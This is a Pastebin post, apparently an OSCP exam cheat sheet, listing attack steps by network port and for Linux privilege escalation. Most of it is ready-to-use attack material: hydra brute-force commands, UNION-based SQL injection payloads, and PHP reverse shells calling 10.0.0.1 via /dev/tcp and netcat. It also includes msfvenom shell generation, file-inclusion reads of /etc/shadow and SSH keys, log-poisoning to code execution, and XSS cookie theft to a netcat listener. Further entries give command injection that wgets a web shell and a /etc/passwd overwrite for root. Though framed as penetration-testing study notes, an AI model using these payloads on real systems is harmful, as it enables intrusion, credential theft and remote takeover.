Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- PORT 21 (FTP)
- -Check for anonymous login (anonymous:anonymous)
- -Check for directory transversal ( ls ../../../) enumerate files outside the FTP root.
- Look for password files that could be used on ssh or a webserver.
- -Check ftp version for buffer overflows or other exploits.
- -Check to see if there are writable directories, like web roots.
- EXAMPLE: (cd wwwroot; put shell.asp)
- PORT 22 (SSH)
- -Banner grab version (nc ipaddress 22)
- -Google ssh version for exploits etc.
- -Predictable PRNG? (sufferance)
- -Once a username is discovered TRY A BRUTEFORCE
- EXAMPLE: (hydra -l patrick -P /usr/share/wordlists/rockyou.txt 10.11.1.24 ssh)
- -SSH can be used to portforward any service that is only accepting local connections
- EXAMPLE: (ssh -L 127.0.0.1:80:intra.example.com:80 gw.example.com)
- PORT 23 (TELNET)
- -Bruteforce (hydra -l root -P /usr/share/worslists/rockyou.txt 10.11.1.12 telnet)
- -Banner grab version and look for exploits (nc 10.11.1.12 23)
- PORT 25 (SMTP)
- -Manually or automated VRFY users, greet server with ehlo if needed.
- -Bear in mind pop3 could also be vulnerable to login/access.
- -Check version as always, benner grab with telnet
- PORT 80 (HTTP)
- -Nikto to check for low hanging fruit (nikto -h http://10.11.1.12)
- -Google all versions returned from Nikto, watch for shellshock, .action pages, robots.txt, manually poke around, check source code
- -Gobuster (/usr/bin/gobuster -w /usr/share/wordlists/dirb/big.txt -u http://10.11.0.42). Add -X to search extensions
- -Login Form = SQLI or Default Credentials, or rabbithole. Those are the main options.
- -Try admin:admin, admin:password etc.
- -Try to understand the webserver, whats its purpose? what features are availible? if something stands out, it could be the way in...
- -SQLI >> ' or 1=1-- >> admin'-- >> ' or '1'='1#
- -Error based SQLI, identify queiry string or error (http://meme.com?id=1)
- -Enumerate columns (http://meme.com?id=1 order by 1) keep going until unknown column error.
- -Determine best column to use to display output (http://meme.com?id=1 union all select 1,2,3,4,5)
- -If you see a number on the screen that column can be used.
- -Find tables in database (http://meme.com?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables
- -Display table columns in tables found (http://meme.com?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns WHERE table_name='users'
- -Display column contents, use concat for multiple
- (http://meme.com?id=1 union all select 1,2,3,concat(usernames,0x3a,passwords),5 FROM users
- -Side note sometimes sleep(0) comes in handy if no output is being displayed, see Hackademic_RTB1 box.
- -Check Nikto see if PUT is enabled, if so use nmap scripts to upload a shell. (nmap -p 80 <ip> --script http-put --script-args http-put.url='/uploads/rootme.php',http-put.file='/tmp/rootme.php')
- -Also viable are .asp shells or .ps1 for powershell.
- -PHP Payloads
- 1) <?php echo shell_exec("bash -i >& /dev/tcp/10.0.0.1/8080 0>&1");?>
- 2) <?php echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f");?>
- 3) <?php echo shell_exec($_GET['e']);?>
- 4) php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
- 5) pentest monkey php reverse shell, availible here http://pentestmonkey.net/tools/web-shells/php-reverse-shell
- -ASP Shell Generation (msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.42 LPORT=4444 -f asp > shell.asp
- -LFI (Local File Inclusion)
- -Basic Test For Apache Linux is 3 Directories ../../../etc/passwd
- -Check query strings like ?page=, ?file=
- -Older php versions allow truncating the extension ../../../etc/passwd%00 if the server adds an extension to the file
- -FILES TO INCLUDE
- 1) /etc/passwd
- 2) /etc/shadow ?
- 3) /root/.ssh/id_rsa
- 4) index.php
- 5) Any other files discovered (i see you poison from htb)
- -LFI to RCE
- -try to include /proc/self/environ
- -if this file can be included put one of the php shells as the current user agent. When the file is included the php will be ineterpreted and run.
- -try to include /proc/self/fd
- -if this can be included find the main log file by including /self/1 all the way through 23
- -then change the referer header to php and revisit the file to run the code.
- -try to include /var/apache/logs/access.log
- -if this can be included get rce.
- -RFI (Remote File Inclusion)
- -Check ALL LFI QUERY STRINGS!
- -listen on standard http port with netcat as a check (nc -lnvp 80) then ?page=http://10.11.0.42
- -check if a get request is made to the handler.
- -Use a php payload to gain a shell, remember null byte may be added to truncate extension on lower php versions
- -If execution of root commands is availible from any other means, change the mod of the php shell dir to root suid bit.
- -XSS (Cross Site Scripting)
- -Easy enough, first try script tags, then an iframe... maybe some shennagins like <scr<script>ipt> other encodings
- -Hijack admin password by making a request to a netcat port 80 handler (http://10.11.0.41/meme.php + document.cookie)
- -Does this even apply to the exam??
- -Can maybe use stored xss to make GET api requests to do some fun stuff (might be out of scope entirely)
- -Command Injection
- -Pretty simple, webserver calls upon the operating system to perform tasks without sanitizing arguments.
- -ping.php, can input something with a seperator (127.0.0.1; ls)
- -From there use wget payload to upload a shell (127.0.0.1; wget http://10.11.0.42/shell.php -o /var/www/html/shell.php)
- -Blind and File-based out of scope NO COMMIX ALLOWED
- -Weak Authentication
- -Pretty straight forward admin:admin, admin:password, administrator:administrator etc.
- -Apache Tomcat, tomcat:tomcat, tomcat:password
- -GOOGLE ALL DEFAULT PASSWORDS
- -In general, use brain and google all versions, remember a lot is out of scope for oscp... no xxe or pickle deseralization lol
- PORT 445 (SMB)
- -Note this is one case where sparta can save a lot of time...
- -run nmap nse scripts on the target (nmap --script=vuln 10.11.0.41)
- -Find smb users (nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254)
- -Try to find open smb shares (nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24)
- -access the share (smbclient "\\\\ip\\Bob Share\\rootfs") sufference lol
- -Try to read ssh keys, or other files maybe /etc/shadow?
- -Use any exploits that provide RCE, manual eternalblue https://github.com/3ndG4me/AutoBlue-MS17-010 etc.
- -remember filtered port 445 or 139 in privesc can be portforwarded to use smb exploits!!
- -impacket smb client very useful!
- PRIVESC LINUX
- -check current user (whoami)
- -check kernel version (uname -a) google for exploits, check exploitdb
- -upload linuxprivchecker.py (python -m SimpleHTTPServer 80) (wget http://10.11.0.42/linuxprivchecker.py)
- -in general use brain.
- -ssh tunnel filtered services.
- -check to see writable files, remember privesc with python scripts and how import reads from the pwd
- -check sudo priviliges (sudo -l) use those to overwrite files, or to run other commands as root
- -check for all files with "pass" in them.
- -is /etc/passwd writable? if so use (echo root::0:0:root:/root:/bin/bash > /etc/passwd) then (su)
- -if /etc/passwd is readable try and crack hashes unshadow with /passwd first (unshadow passwd.txt shadow.txt > passwords.txt) (john passwords.txt /usr/share/wordlists/rockyou.txt)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement